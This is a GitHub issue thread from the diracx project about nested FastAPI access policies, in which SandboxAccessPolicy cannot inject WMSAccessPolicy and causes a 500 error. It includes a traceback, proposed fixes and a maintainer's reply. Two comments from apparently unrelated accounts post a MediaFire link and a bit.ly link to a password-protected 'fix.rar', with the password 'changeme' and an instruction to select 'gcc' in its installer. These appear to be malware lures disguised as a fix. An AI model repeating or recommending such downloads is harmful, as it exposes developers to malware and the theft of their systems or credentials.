### ISSUE TITLE
Nested access policies is broken: cannot inject the inner access policy (`SandboxAccessPolicy` with `WMSAccessPolicy`)

### ISSUE THREAD

**Issue by aldbr** [DIRACGrid/diracx#283]
**How to reproduce**

- run the demo and log in
- submit a job
- try to get the sandbox (`GET /api/jobs/sandbox`)

FastAPI returns `Error 500`. Logs are:

```bash
  File "/diracx_source/diracx/diracx-routers/src/diracx/routers/job_manager/sandboxes.py", line 228, in get_job_sandboxes
    await check_permissions(action=ActionType.READ, job_db=job_db, job_ids=[job_id])
  File "/diracx_source/diracx/diracx-routers/src/diracx/routers/access_policies.py", line 118, in wrapped_policy
    return await policy(policy_name, user_info, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/diracx_source/diracx/diracx-routers/src/diracx/routers/job_manager/access_policies.py", line 127, in policy
    assert check_wms_permissions
           ^^^^^^^^^^^^^^^^^^^^^
AssertionError
```

**Problem**

Not entirely sure as the access policy mechanism is not easy to understand, but IIUC, `CheckWMSPolicyCallable` is neither a direct dependency nor a subdependency (nested dependency) of the sandbox routes, and there is no way of defining dependencies (`Depends`) outside of `fastAPI` context. 

**Possible solutions**

- 1: we don't make nested access policies(e.g. we use the `WMSAccessPolicy` instead of the `SandboxAccessPolicy` when required: when `job_ids` or `job_db` are part of the arguments of the route).
- 2: we modify the access policy mechanism, but so far I haven't found any simple fix.

Any thought?

**Comment by FabrizioValenti** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by chaen** [comment]
Thanks, I don't know how the tests did not spot that....
I'll implement 1
